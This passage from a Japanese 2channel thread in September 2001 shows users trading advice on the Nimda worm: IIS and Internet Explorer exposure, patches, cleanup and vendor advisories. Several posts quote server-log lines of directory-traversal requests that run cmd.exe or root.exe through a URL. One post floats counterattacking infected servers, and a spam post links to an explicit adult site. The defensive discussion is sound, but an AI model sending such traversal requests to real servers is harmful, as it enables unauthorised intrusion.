275 :名無しさん@お腹いっぱい。:01/09/21 05:48
>>244
てことは、クライアントでもネットワーク共有経由で感染するの?
マカフィーのサイトだとサーバにしか感染しないようだったのに。
やばくない。LANが機能しなくなる。

276 :7743:01/09/21 05:53
>>274
Asia Pacific の NICでねーの?

277 :名無したんに接続中・・・:01/09/21 06:00
>>275
ネットワーク経由じゃ感染はしないけどウィルスファイルを大量にコピーされる、、だったと思う
IISサーバあって対策できてないなら無条件で感染したと思っていい。

278 :名無しさん@お腹いっぱい。:01/09/21 06:07
>>277
そりなら大丈夫です。ちょっとほっとした。

279 :名無しさん@お腹いっぱい。:01/09/21 06:09
あっ278は275が書きました。ありがとうございます>>277

280 :名無しさん@お腹いっぱい。:01/09/21 06:13
>>276
厨房なので「Asia Pacific の NIC」までは、和訳した時に
読めたのですが、意味がわからないので教えてください。

気にする必要ないって事でしょうか?

281 :名無しさん@お腹いっぱい。:01/09/21 06:59
Apaceh使ってますです。
ポート変えたら
2001/09/20(07:52:57) W-SV [80] E200035 " .. が含まれるリクエストは許可されていません。[ "/scripts/..s5c../winnt/system32/cmd.exe" ]"
2001/09/20(07:52:58) W-SV [80] 500 267 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/20(07:53:05) W-SV [80] E200035 " .. が含まれるリクエストは許可されていません。[ "/scripts/..s5c../winnt/system32/cmd.exe" ]"
2001/09/20(07:53:05) W-SV 2[80] 500 267 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

↑こいつが減った・・・・ いや、無くなった。
ちょっと安心。
でも、http://homepage:ポート番号/ じゃないとブラウズできんじゃん

282 :名無しさん@お腹いっぱい。:01/09/21 07:40
>>280
JPNIC の上位組織

283 :名無しさん@お腹いっぱい。:01/09/21 07:45
[memo:1302] Windows Update IE 6 「最小構成インストール」 はNimdaに対して脆弱なまま
http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html

284 :名無しさん@お腹いっぱい。:01/09/21 07:52
>>281 Nimdaとかはhttpのデフォルトのポート叩くんだから.そらそうだ。
個人でサーバたてて個人的に使うならそれもいいね。たしかに。
しかし普通はそんなことできない。
バーチャルホストで直IPで来るリクエストを無視するように
した方が現実的だなぁ。
Apacheバーチャルホスト説明書
ttp://fuji.rccm.co.jp/manual/vhosts/

285 :名無しさん@お腹いっぱい。:01/09/21 07:56
Nimdaアタックをかけて来るサーバーってIISのセキュリティが
空いたままなんだよね。
それを使ってNimdaアタックをかけて来たらカウンターで相手
サーバーをシャットダウンすることが出来ないかな?(w
ウイルスに犯されたサーバーなんてシャットダウンした方が
世のため人のためだyo(´ー`)y─┛~~~

286 :名無しさん@お腹いっぱい。:01/09/21 07:58
>>284
レスサンクス。
そそ。普通では出来ないんだよねぇー
そのサイト見て色々と試してみるよん。
それとさ、今までアクセスしてきたNimdaはどうなるんだろう?
ウチはApacheだから大丈夫だよね?
踏み台にはされてるのかな?

287 :名無しさん@お腹いっぱい。:01/09/21 07:59
>>285 言ってることはもっともで正しいが、法律が許してくれん。(T_T)
CodeRedの時もあったな。そうゆう話。そんなソフト作って配ったら
どう?って。

288 :名無しさん@お腹いっぱい。:01/09/21 08:27
>>259

まかふぃー
> http://www.nai.com/japan/virusinfo/nimdatmp.asp
過去ログ見ると、ここの情報↑は信用できないから気を付けろ

http://slashdot.jp/article.pl?sid=01/08/21/0428210

289 :名無しさん@お腹いっぱい。:01/09/21 08:30
>>282
なんでJPNICの上位組織が、ポートを叩いてくるのか
教えてください

そこが踏み台になってるって事?

290 :名無しさん@お腹いっぱい。:01/09/21 08:33
DNSだかPPPだかの仕様。
問題は全くない。

291 :名無しさん@お腹いっぱい。:01/09/21 08:38
>>290

よくわからん。ポートたたかれてなんで問題ないの?

わかるように説明きぼーん

292 :名無しさん@お腹いっぱい。:01/09/21 08:38
>>283
>[memo:1302] Windows Update IE 6 「最小構成インストール」 はNimdaに対して脆弱なまま
>http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html

脆弱性の確認デモコードはこちら
http://memo.st.ryukoku.ac.jp/archive/200109.month/1286.html

やっぱり本物はすごいねー♪

293 :名無しさん@お腹いっぱい。:01/09/21 09:30
>292
これ、Win98SE、IE6.0 で試してみたら(ファイルをIE上にドラッグ)、
想定外(?)のメディアプレイヤーが開いて、

”Windows Media player のエラー
オブジェクト名が見つかりませんでした。”

となるんだけれど・・・・・
これって安全、危険 どっち?

ちなみに、ファイルをダブルクリックするとoutlookが立ち上がり、警告が表示される。

294 :名無しさん@お腹いっぱい。:01/09/21 09:30
うちのapacheに最初にNimdaで足跡残したサイト、
いまだに攻撃してきてるよ(´ー`)y─┛~~~
うちにこれまで来た257回の攻撃のうち、57回までこ
こだったりする...

で、ぶらっとサイト見に行ったら...

>> 9月20日(木)
>>
>> どうもNIMDAに感染してしまったようです。
>> あなたのブラウザーは対策済み、でしょうか?
>> そうでなければ(もう遅し、やもしれませんが)いち早くNUZから抜けてください。
>>
>> お願いします!
>>
>> 対策講じますのでお時間を!

...とっととサイト閉鎖しろやヽ(`Д´)

295 :名無しさん@お腹いっぱい。:01/09/21 09:31
さて今のID!

296 :名無しさん@お腹いっぱい。:01/09/21 09:31
無かった・・・ごめんTT

297 :名無しさん@お腹いっぱい。:01/09/21 10:03
うわ〜群馬ダサい… 県庁のPC43台感染か。
群馬県民として悲しい

298 :名無しさん@お腹いっぱい。:01/09/21 10:04
>>291
よこからスマソ

TCP80(HTTP)、TCP113(Ident)のSYNのみの場合
1.APNICの職員がport叩いてみた
2.踏み台にされていた
3.NICデータベース登録漏れ
4.ソースアドレス改竄
5.あなたのログ改竄

TCP80(HTTP)、TCP113(Ident)のSYN→SYN-ACK→ACKの場合
1.APNICの職員がport叩いてみた
2.踏み台にされていた
3.NICデータベース登録漏れ
4.あなたのログ改竄
5.凄腕ハカー

299 :名無しさん@お腹いっぱい。:01/09/21 10:53
駆除に成功はしたけれど、その後Excelの調子が悪くなるPCがかなりある。
 ・名前をつけて保存を実行したときに保存先のダイアログが表示されない。
 ・新規ワークシートが作れない。
対策ある?・・・わけないよなぁ。
再インストールしかないんだろーか。何十台も。はぁ・・・。

300 :名無しさん@お腹いっぱい。:01/09/21 10:56
モロ、無修正画像サイト発見!

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

301 :名無しさん@お腹いっぱい。:01/09/21 11:18
>>299
うちの会社でもそれ多いよ。
余計なDLL削除したりしてないか?

302 :S.Inoue@army:01/09/21 11:21
>>299
これはrichなんとか.dll(名称失念)が感染したのでやむなく
削除したからだ。

Windows(OS)のCD-ROMから何とか探し出して解凍し、
c:\windows\systemかc:\windnt\system32に放り込むと
直るよ。

>>300
ウゼエ!一手由。

303 :名無しさん@お腹いっぱい。:01/09/21 11:22
>>298

つまり「問題ない」はデマ?

「問題があるかも知れない」?

304 :名無しさん@お腹いっぱい。:01/09/21 11:24
>>294

どこよここ?

行かないようにすっから公開きぼーん。

305 :299:01/09/21 11:41
>>301-302
レスありがとう。
トレンドマイクロに問い合わせたら同じようなこと言われたよ。

306 :名無しさん@お腹いっぱい。:01/09/21 11:43
ワラタ。海軍ダーヨ。

vtc1.med.navy.mil - - [21/Sep/2001:11:31:56 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314

307 :名無しさん@お腹いっぱい。:01/09/21 11:46
わりー。ちょっと教えてくだされ。

5.00.2014.0216=IE5.0=キケーン
5.00.2314.1003=IE5.0(Office2000付属)=キケーン
5.00.2919.6307=IE5.01=キケーン
5.00.2920.0000=IE5.01(W2K付属)=キケーン
5.00.3105.0106=IE5.01SP1=キケーン
5.00.3314.2101=IE5.01SP2=ウマー
5.50.4134.0600=IE5.50=キケーン
5.50.4522.1800=IE5.50SP1=キケーン
5.50.4807.2300=IE5.50SP2=ウマー
(キケーン=サイト見ただけ、メールプレビューで感染)
でもウマーのSP2もダウソしたり、添付ファイル開けば感染。

SP2もダウソってどういう意味?

308 : :01/09/21 11:55
WinIE5.5SP1で
http://windowsupdate.microsoft.com/
へ行ってみたら

>Internet Explorer 5.5 Service Pack 1 とインターネット
>ツールをダウンロードしてください!

となってたけどどゆこと? SP2じゃないの?

わな?

309 :名無しさん@お腹いっぱい。:01/09/21 11:56
>>307
SP2だと、
>キケーン=サイト見ただけ
これが回避される→ダイアログが出るようになる
ってことでしょ。ダイアログでキャンセルせずに実行すれば感染。

310 :名無しさん@お腹いっぱい。:01/09/21 11:59
>>308
単に表の表示を更新してないだけだろ。
更新をクリックすれば、推奨する更新の項目にあるはずだが。

311 :名無しさん@お腹いっぱい。:01/09/21 12:08
>>299 >>302

riched20.dll

312 :294:01/09/21 12:17
>>304
165.76.4.250 - - [21/Sep/2001:08:42:07 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

今見に行ったらサーバ落ちてるけどね。

313 :ななしたん:01/09/21 12:25
攻撃減った?

314 :名無しさん@お腹いっぱい。:01/09/21 12:26
感染したのでCドライブだけフォーマットして再インスト
そしたらDドライブに感染したファイルがありますとノートンさんが言うので削除しました
それ以後警告はされないけどなんか心配…
これってノートンさんを信じていいですか?

315 :名無しさん@お腹いっぱい。:01/09/21 12:29
>>314
ノートンさんあきれて言葉が出ないようですよ

316 :名無しさん@お腹いっぱい。:01/09/21 12:29
のーとんさん、今日の午前中にアップデート出てるよーん。

317 :名無しさん@お腹いっぱい。:01/09/21 12:35
>>316

>>203の対策かな?だれか作って送ってあげた?(笑)

318 :名無しさん@明日があるさ:01/09/21 12:39
ergr

319 :名無しさん@お腹いっぱい。:01/09/21 12:40
>>136

こちらはなしのつぶて・・。

320 :田中誠二:01/09/21 12:51
<Nimdaによるものと判明>
今回のトラブル(注文メールが送れない、データ登録や
売切処理が出来ない等)は新種ウイルスNimdaに
弊社サーバー1台が感染したためと判明しました。

<完全復旧の見込>
9月23日深夜から24日午前に完全復旧する予定です。
それまでは現状のまま注文メール、データ登録、売切
処理は出来ません。ただ前回のCodeRedによる
対策を実施した経験から完全復旧には自信を持っています。
下記の事情ですので皆様方の
ご理解を宜しく御願い申し上げます。

<主な経過と現状>
(1)スーパー源氏は全体で7台のサーバーで
運用しています。今回は6台のサーバーは全く感染
していないことを確認しており、1台のみが感染
していたことを確認しました。
(2)感染した1台は皆様方がデータを登録する
MASTERサーバーでメール処理等も行っています。
既にこのサーバーはネットワークから切り離して
おります。Nimdaに感染するとみずから感染元になって
他のサーバーをNimdaに感染させるため切り離しました。
(3)前回のCodeRedによる経験から完璧に対処するには
Windows2000サーバーをフォーマットしWindowsNT4.0を
インストールしサービスパックその他のウイルス対策ソフト
をインストールする必要があります。感染していない
6台のサーバーは根本的対策を実施していましたので
被害を受けませんでした。マイクロソフトの
対策ソフトをインストールするだけでは不十分で
Windows2000そのものの脆弱性をターゲットに
されています。しかしマイクロソフトは損害賠償
請求を回避するため口が裂けてもそのようなことは言えない
のが実情です。
-------------------------------------------------------
(有)紫式部
代表取締役 河野仁美
インターネット古書店案内
http://www.murasakishikibu.co.jp/oldbook/

321 :名無しさん@お腹いっぱい。:01/09/21 13:02
>>320
Windows2000そのものの脆弱性
って具体的に何?
そんな情報流れてたっけ?

322 :名無しさん@お腹いっぱい。:01/09/21 13:03
如何防治尼姆t封a毒

323 :名無しさん@お腹いっぱい。:01/09/21 13:04
ニムダ食らって一時閉鎖中のサイトって、そのまま廃止になっちゃうところも多いんだろうな・・。

324 :名無しさん@お腹いっぱい。:01/09/21 13:34
>>321
ドキュソ管理者が対策できない責任をWindowsに押し付けてるだけ
>ただ前回のCodeRedによる
>対策を実施した経験から完全復旧には自信を持っています。
アホか。感染しないように対策しろよ。

325 :名無しさん@お腹いっぱい。:01/09/21 13:41
>>324
> アホか。感染しないように対策しろよ。

御意。

ttp://210.124.76.100/

こんなふうにね。

326 :名無しさん@お腹いっぱい。:01/09/21 13:43
>ttp://210.124.76.100/


こーどれっどの上にニムダ飼ってる( ̄△ ̄;

327 : :01/09/21 13:45
>>321
リソースのアクセス権の継承がない。

328 :名無しさん@お腹いっぱい。:01/09/21 13:47
>>326
fuck USA 〜はsadmindだ。

329 :名無しさん@お腹いっぱい。:01/09/21 13:49
>>328

見てきたの?(^^;

330 :名無しさん@お腹いっぱい。:01/09/21 14:00
>>329
大した事なかったよ。

331 :名無しさん@お腹いっぱい。:01/09/21 14:09
ttp://www.with9.com/mag/0009-1h/0009-1h.asp

この期におよんで新しく感染しているバカが・・。

332 :名無しさん@お腹いっぱい。:01/09/21 14:23
>>331
ヲイヲイ、with9かよぉ。
おれ、よく利用してるんだぜ。
Topは大丈夫みたいだが・・・

333 :名無しさん@お腹いっぱい。:01/09/21 14:39
http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp?MAINMODE=&MODE=VIEW&ID=13&MOVEPOS=&MOVETYPE=

334 :名無しさん@お腹いっぱい。:01/09/21 14:45
age

335 :名無しさん@お腹いっぱい。:01/09/21 14:59
普段は2ちゃんねらーなんて、デブオタだろうとバカにしてたけど
みんな詳しいのね・・・
負けたよ・・・・

336 :名無しさん@お腹いっぱい。:01/09/21 15:00
みんな行っているのかな?

http://www.trendmicro.co.jp/nimda/seminar/index.htm

337 :名無しさん@お腹いっぱい。:01/09/21 15:01
>>327
継承しますが何か?

338 :名無しさん@お腹いっぱい。:01/09/21 15:10
>>336
確かにつながらない・・・
と思ったらつながるようになったyo!

339 :名無しさん@お腹いっぱい。:01/09/21 15:26
http://www.jp-express.com/jp-express/visitors/img-box/img20010919074204.jpg
怖いよ−・・・・
これは何の生き物ですか・・・
何かさけんでる・・・

340 :名無しさん@お腹いっぱい。:01/09/21 15:31
>>339
ゴルァ っていってそうだね。

341 :名無しさん@お腹いっぱい。:01/09/21 15:36
>>340
Yumiちゃん怒ってんだ(ワラ

342 :名無しさん@お腹いっぱい。:01/09/21 16:00
>>339-341
ワラタ

343 :名無しさん@お腹いっぱい。:01/09/21 16:04
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
いまみたら、IE4.0とかも対象になってるじゃねーかよ・・・

344 :名無しさん@お腹いっぱい。:01/09/21 16:17
>>343
>http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
> いまみたら、IE4.0とかも対象になってるじゃねーかよ・・・

だまって増やすなよ(´。`;)>MS

>>83 6や4も含めて更新キボンヌm(_ _)m>識者の方

345 :343:01/09/21 16:31
いまみたら、IE6も対象になったぞ。(なかなか、良い更新スピードじゃ)

346 :名無しさん@お腹いっぱい。:01/09/21 16:33
>>343,>>344
感染の影響範囲を広げていくことのところで

Internet Explorer の既知の脆弱性を利用した 感染したサイトのホームページ閲覧による感染

てのが無いぞ。既に4つ感染方法が確認されてるだ。

347 :343:01/09/21 16:34
しかし、IE6.0の対策方法が何にも書いて無いじゃないか・・・

348 :343:01/09/21 16:39
>>346
それは「Internet Explorer の既知の脆弱性を利用した E-mail による感染」に含まれます。
なぜかというと、javascriptsで、emlファイルを開けているだけだからです。
つまり、e-malによる感染なんです。

ちなみに、JavaScritpsでファイルを開けるのは脆弱性ではなく仕様です。

349 :名無しさん@お腹いっぱい。:01/09/21 16:49
いつになったら気付くんだyo!

http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp?MAINMODE=&MODE=VIEW&ID=13&MOVEPOS=&MOVETYPE=

350 : :01/09/21 16:53
>>348
補足すると、NetscapeのJavaScriptでは感染しないです。

JavaScritpsでファイルを開けるのは
HTMLでファイルを開けるのと同じことです。
だから、emlファイルを開けるのにJavaScript使うのは
冗長といえます w
IEとアウトルックのパッチも当てずに
JavaScriptを慌てて切ってる人は○○認定がもらえます。

そういう人は次回はHTMLで感染するですね。

351 :名無しさん@お腹いっぱい。:01/09/21 16:57
>>347

>>292のリンク先に書いてあるのでは?
要は最小構成じゃなきゃOKなんじゃないの。

352 :343:01/09/21 17:06
>>350
NN使いでもemlにIE or Outlookが関連づけされてる場合でも大丈夫?

あと、ごめん、いまいち理解できてない。。。<俺
IEでもJavaScriptsを切っていれば、一応「Webを見ただけで感染」は防げるのでは?
もうちょっと、詳しく教えてくだされ。

>>351
いや、MSのサイトにって事。

353 :名無しさん@お腹いっぱい。:01/09/21 17:07
しかしWindowsXPでこうゆうことになったらどうなんだろ。
今回みたいな再インストールしなければならんのワームが猛威をふるったら、
アクティベーションの電話パンクしてパニックかも。

354 :病人:01/09/21 17:16
Win2k クリーンインストールして,真っ先に IE5.5 SP2 入れたのに
あっというま(数時間)に Nimda に罹ったで。
どういうこっちゃ。

355 :名無しさん@お腹いっぱい。:01/09/21 17:17
IEのDLページに行けない・・・
今サーバー重くないですか?
それとも漏れだけ?

>353
再インストでもアクティベーションって必要だっけ?

356 :名無しさん@お腹いっぱい。:01/09/21 17:17
>>354

おれも。当時最新ののーとんインターネットセキュリティー入れてたのに(18日晩)

357 :名無しさん@お腹いっぱい。:01/09/21 17:18
>>354
IISが立ち上がってたというオチ?

358 :名無しさん@お腹いっぱい。:01/09/21 17:19
>>352
でも、MSのサイトにも
Nimda ワーム の影響を受ける恐れのある製品
のトコに
6 (最小構成時のみ)
って太字で書いてあるよ。

359 :名無しさん@お腹いっぱい。:01/09/21 17:19
NISにアンチウィルス機能ついてたっけ?

360 :名無しさん@お腹いっぱい。:01/09/21 17:19
>>355

感染ディスクを切り離したり、パーティーション変えたらだめなんじゃん?

361 :名無しさん@お腹いっぱい。:01/09/21 17:22
>>359

ついてる。いまはそれのおかげでにむだのダウンロード阻止してくれてるが・・。

362 :名無しさん@お腹いっぱい。:01/09/21 17:31
>>355 再インストでもアクティベーションいると思ったが。
アクティベーションの情報は混乱してるから自信ないや。

363 :355:01/09/21 17:35
>360
なるほど・・・「ハードウェアの構成」が変わるから駄目なんですね

まだIEのページ逝けない SP2落とさせろゴルァ(゜Д゜)

364 :355:01/09/21 17:36
って書きこんでる最中にレスが・・・
アクティベーション関係はごちゃごちゃしてますね・・・

365 :343:01/09/21 17:42
>>358
だから、対策だってば。

366 :病人:01/09/21 17:56
>>357
IIS なんて,インストールもしとらん。

367 :名無しさん@お腹いっぱい。:01/09/21 18:08
>>366
ファイル・フォルダ共有してあるましんで、
別のマシンからうつされたんじゃないのか?

368 :名無しさんに接続中…:01/09/21 18:11
Apacheの方がもっと浸透してると思いますけど・・・

「ウイルスに狙われるのはIIS浸透の代償」とマイクロソフト阿多社長
http://itpro.nikkeibp.co.jp/free/NC/NEWS/20010921/1/

369 :中国一号(藁:01/09/21 18:21
「中国一号」,100万人に感染か──人民日報
http://www.zdnet.co.jp/news/bursts/0109/21/people.html

370 :名無しさん@お腹いっぱい。:01/09/21 18:24
すげー、コイツ何者??って、お馬鹿の総大将か。
ウイルスに狙われるのはIISが一番穴空いてるからじゃん。
いち早く設置したページも重すぎてみれんよ。

371 :名無しさん@お腹いっぱい。:01/09/21 18:25
>>366
9x系からのアップデート版ではないか?
パーソナルWebサーバーがインストールされてるとアップデート時に漏れなくIISがインストール稼動するぞ。
バージョン忘れたがフロントページがインストールされているとパーソナルWebサーバーもインストールされるらしい。

372 :名無しさん@お腹いっぱい。:01/09/21 18:26
人民日報っていつもあやしいネタだよな・・・
中身はNimdaと酷似してると思うんだが。

373 :名無しさん@お腹いっぱい。:01/09/21 18:30
IISが生きてるかチェックする方法を指南してあげてくれ。

374 :名無しさん@お腹いっぱい。:01/09/21 18:33
>>368

いままでは数が多いからとかいわれてふーんとか思っていたが、
はじめて「Windowsが狙われている」という証明を見た気がする・・。

375 :名無しさん@お腹いっぱい。:01/09/21 18:37
>>368
早急に阿多氏の脳に対するアップデートを
適用すべきだと思います。

376 :名無しさん@お腹いっぱい。:01/09/21 18:38
>>372

あいつら、ウイルス対策ソフトの正規版なんか持ってないんだろうな(藁

377 :名無しさん@お腹いっぱい。:01/09/21 18:40
がいしゅつかもしれんが、Nimdaの挙動がかいてるYO

HTTP://kgate.virtual.net/cgi-bin/wiki.cgi?action=Browse&id=NIMDAWorm

378 :名無しさん@お腹いっぱい。:01/09/21 18:42
>>373
Ctrl+Shift+Escでタスクマネージャを立ち上げて、
inetinfo.exeが動いていたらIIS有り。

379 :名無しさん@お腹いっぱい。:01/09/21 18:43
http://www.nimda.com/

なんでこんなURLがあるんだyo!

380 :名無しさん@お腹いっぱい。:01/09/21 18:44
ぉっ。

http://www.nimda.net

381 :名無しさん@お腹いっぱい。:01/09/21 18:46
犯人は突き止めたぞ。(ワラ
http://www.nimda.net/contacts/index.asp

382 :名無しさん@お腹いっぱい。:01/09/21 18:47
http://www.nimda.org

ありゃ。

383 :名無しさん@お腹いっぱい。:01/09/21 18:49
http://www.nimda.co.kr/

さすがにないです(^^ゞ

384 :名無しさん@お腹いっぱい。:01/09/21 18:50
Not all nimda's are bad

385 :名無しさん@お腹いっぱい。:01/09/21 18:51
>>378
やさしいな。
それでも分からん奴のために追記すればプロセスだぞ。
あと、慌ててフレームをWクリックしてバグったとか騒が
ないように(藁 もう1度Wクリックすれば直る。
しかしあれなんのためにあるんだ?

386 :名無しさん@お腹いっぱい。:01/09/21 18:55
>>376

じゃあ中国人も

ttp://210.124.76.100/

こんなの見せられてるってコト?(藁

387 :名無したんに接続中・・・:01/09/21 18:56
>>386
だから不用意にリンク張るなって・・・

388 :名無しさん@お腹いっぱい。:01/09/21 18:58
>>387

ハァ?

389 :名無しさん@お腹いっぱい。:01/09/21 19:00
>>293
漏れのもそうなったんだけど、どうなの?
これって危険?
いろいろ読んだんだけどわからん!
ちなみにW2KにIE6いれとります。

390 :名無しさん@お腹いっぱい。:01/09/21 19:03
>>389

っていうか、感染したかどうか識別するソフトぐらい入れようよ。

まともなウイルスチェックのソフトいれてたらそんなことおきないよ。

391 :名無しさん@お腹いっぱい。:01/09/21 19:05
>>385
Internat.exe というのが見つかりましたが、
これは大丈夫ですか?

392 :名無しさん@お腹いっぱい。:01/09/21 19:06
>>389
コマンドプロンプトでdirを見せられなければ大丈夫だと思う。
うちはどのファイルで開くかを聞かれたけどキャンセルでOK。
w2ksp2+IE6
>>391
問題なし。

393 :392:01/09/21 19:08
>>392
間違い
> どのファイルで
どのアプリケーションで

394 :名無しさん@お腹いっぱい。:01/09/21 19:14
>>390
ウィルスバスター2001いれとるよ
隔離失敗ってなる
だから聞いてみたんだけど・・・

>>392
コマンドプロンプトは開きませんでした
W2K+SP2&もろもろのパッチあててます
W2KってIE6のインストール方法(最小とかカスタムとか)って
選べないですよね。これって>>292にあるような最小インストール
ってことなんですかね。ちょっと不安・・・

395 :名無しさん@お腹いっぱい。:01/09/21 19:16
いやーん
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
なくなったよぅ

396 :395:01/09/21 19:18
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
あれ?見れるようになった・・・

397 :( ◆h5s/vIfE :01/09/21 19:29
"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
↑コレ、外出だけど、実際感染・・から・したreadme.eml色々やっ
て見てみると確かにこのクレジット有るのよ。ソースに。
・・・R.P.って、中華人民共和国産?コンセプトウイルス?V.5??
Ver.3や4も有るってこと?ってーか、6や7これから出るのかな。。
コンセプトウイルスって、ちゃんとしたラボであくまで技術向上の
為に作るもんだと思ってた。当然コメントつけて公開するし。
・・・スケープゴートかな。China。社会工学の匂いするぞ。
技術情報じゃ無いからサゲ。

398 :病人:01/09/21 19:37
>>367
どうもそうみたい。

>>371
となりのマシンが,NT4 からのアップデートマシンやけど,FTP サーバ入れてあったんで,
自動的に IIS がインストールされとった。
しかし,そのマシン自体は感染しとらん。今,ちぇっくした。

話せば長いんで話さんけど,IISの入っとるマシンからHDDをひとつ外して感染したマシンに
付けて,フォーマットしてインストールしたんやけど,その過程にどっか一瞬スキが
あって,鬱った模様。でもようわからん。

399 :名無しさん@お腹いっぱい。:01/09/21 19:38
>>394

コマンドプロンプトウィンドウが現れたら ==> 危険
「保存しますか」のダイアログが現れたら ==> 安全
テキストのまま表示されたら ==> 安全
何も起きないなどのその他の場合 ==> たぶん安全

って書いてありますが?

400 :名無しさん@お腹いっぱい。:01/09/21 19:45
>>399
メディアプレーヤーが勝手に再生しようとします。
ということはその他の場合ってことになるんでしょうかね。
まだ不安だ・・・(鬱
ウィルスバスター2001駄目じゃん

401 :名無しさん@お腹いっぱい。:01/09/21 19:49

ん?

http://memo.st.ryukoku.ac.jp/archive/200109.month/1286.html

で作られるテストファイルって、>>394が言うように
ウイルスチェッカーにひっかからないと(ダウンロードダイアログの前に
警告ダイアログ出るとか)まずいのでは?

次回ニムダと同種の手口のやつが来たらひっかかるということでは?

Webサイトはダウンロード前に警告が出るが・・。

402 :名無しさん@お腹いっぱい。:01/09/21 19:55
警告は出るんですけどね

http://memo.st.ryukoku.ac.jp/archive/200109.month/1302.html
のようにもう勝手にreadme.exeを開いちゃうんですよ。
でウィルスバスター2001で警告は出るんだけれど駄目なんです。
IE5.5SP2に戻すしかなさそうです(激鬱

403 :名無しさん@お腹いっぱい。:01/09/21 19:58
>>402

つまりIE6は限りなくグレーってことだ(´Д`)

人柱感謝(-人-) > >>402

404 :(´Д`;):01/09/21 19:59
>>394
隔離失敗って、、、もう実行してないだろな。。。
既に走ってる奴って、隔離できなかったような。。
ちなみにメディアプレーヤー開くのは、不正なMIMEヘッダと
してWAVE指定してるから。ココが唯一の肝。現にreadme.eml
ソース見るとそうなってる。
パッチ当たってないと、不正ヘッダ記述以下のBASE64化され
た添付ファイル部分、自動で走る。EXEでもVBSでもBATでも。
・・・流石に本物で実験してないけど、win32アプリな訳だか
ら、プロンプトは開かないんで無いの?nimda。
不正MIMEヘッダの実験ページのサンプルは、テストコードの簡
単アプリでプロンプト開くけど。。

405 :名無しさん@お腹いっぱい。:01/09/21 20:04
>>394
W2Kができるのはは「完全インストールのみ」だよ。

406 :名無しさん@お腹いっぱい。:01/09/21 20:04
>>404
あー、なんだかますます鬱だよ〜

407 :名無しさん@お腹いっぱい。:01/09/21 20:07
>>402
かわいそうに、最小構成はダメってかいてあるのに。
標準インストールなら大丈夫なんだけど・・・・

Nimda ワーム の影響を受ける恐れのある製品

InternetExplorer
以下のバージョンをインストールしているシステムにおいて、
Internet Explorer の Web ブラウザコントロールを利用する全製品

Microsoft® Internet Explorer 4.0 / 4.01 / 4.01 SP1 / 4.01 SP2
Microsoft® Internet Explorer 5.0
Microsoft® Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Microsoft® Internet Explorer 5.5 または Internet Explorer 5.5 SP1
Internet Explorer 6 (最小構成時のみ)

本ワームへの対策としては、各製品に対して Service Pack 2 のインストールを行うか、
Internet Exploler 6 のインストール(標準)を推奨いたします。

408 :名無しさん@お腹いっぱい。:01/09/21 20:09
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

Nimda ワーム の影響を受ける恐れのある製品


MicrosoftR Internet Explorer 6 (最小構成時のみ)

---

そもそも「最小構成時」とそうじゃないときのちがいってなんだべか?

「最小構成時」の何が問題なんだろう?

インストール後の識別点はあるんだろうか?

409 :名無しさん@お腹いっぱい。:01/09/21 20:11
>>407
W2Kは選べなんですって。

>>405さんが言っているのが確かなのだったら少しは安心なんだけど

IE6駄目 最悪

410 :名無しさん@お腹いっぱい。:01/09/21 20:12
でさ、5.01SP2って、5.5SP2にしたほうがよいの?

それともしない方が無難?

411 :名無しさん@お腹いっぱい。:01/09/21 20:13
元スレでもIE6はあたらしすぎる、やめとけって書いてあったっけ・・。

412 :名無しさん@お腹いっぱい。:01/09/21 20:16
ん?

MSの言う

Internet Explorer 6 (最小構成時のみ)

って、正式版以外はこの限りではない、とか?


Internet Explorer 6βはどんなインストールでも(βナンバーによっては?)罹る可能性もあるし、パッチも出ないとか?

413 :名無しさん@お腹いっぱい。:01/09/21 20:18
Internet Explorer 6βを一度でも入れていたら、Internet Explorer 6βの完全アンインストールまたはWindowsの再インストールをしない限り、Internet Explorer 6正規版を入れても穴あいたままです、なんていかにもMSならありそう・・。

414 :>368:01/09/21 20:18
外向きのWebサーバ必要なくても、IIS使う場合あるからな
MicrosoftのProxyサーバとか
SBSの管理ツール
とか。。そういう意味ではIISの数多いだろうな。。。。
でも冷静に考えれば、
上記のようなものはIISなしで動く作りにできるはずで、
こういう本来的には無用ものを押しつけるマイクロソフトって
タコ。

415 :エラー404:01/09/21 20:19
(・・)ごめんよ。。。欝にしちまって。。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
↑不正MIMEヘッダ関係のパッチ。個別でコレ当てとけ。
http://www.trendmicro.co.jp/nimda/index.asp
↑NIMDA対策ページ。
http://www.trendmicro.co.jp/nimda/manual.asp
↑手動削除法。
まず、SYSTEM.INIの値、書いてあるとおりに書き換え。
拡張子は.iniの後に.txtでも付けてtxt化してそのまま
ノートパッドで書き換え。また拡張子もとの.iniだけに
戻す。→再起動。コレで起動時実行はしなくなるはず。
後は自分で調べて頑張って見てください。
敢えて、勉強。彼女のPC感染したら、直してやって(w

416 :名無しさん@お腹いっぱい。:01/09/21 20:22
> Nimda ワーム の影響を受ける恐れのある製品
> :
> :
> MicrosoftR Internet Explorer 6 (最小構成時のみ)

はっきり喋れや!!M$!!
分かりにくいんだYO!!!!!!!!

417 :名無しさん@お腹いっぱい。:01/09/21 20:22
>>415

> 敢えて、勉強。彼女のPC感染したら、直してやって(w

>>339 Yumiちゃんのも直してやって(w

418 :名無しさん@お腹いっぱい。:01/09/21 20:25
>>339
亀レスながらワラタ

419 :415:01/09/21 20:30
ってーか
IE6って、対応済みって書いてあるし。。。。
って事は、MS01-020関係無いのか。当てられれば良いけどね
5.5に戻した方が良さそう。。
>>339
何でこんな重いのって思ってさっき見れ無かったYO-
パッチ全部外して接続。直してあげたい(W

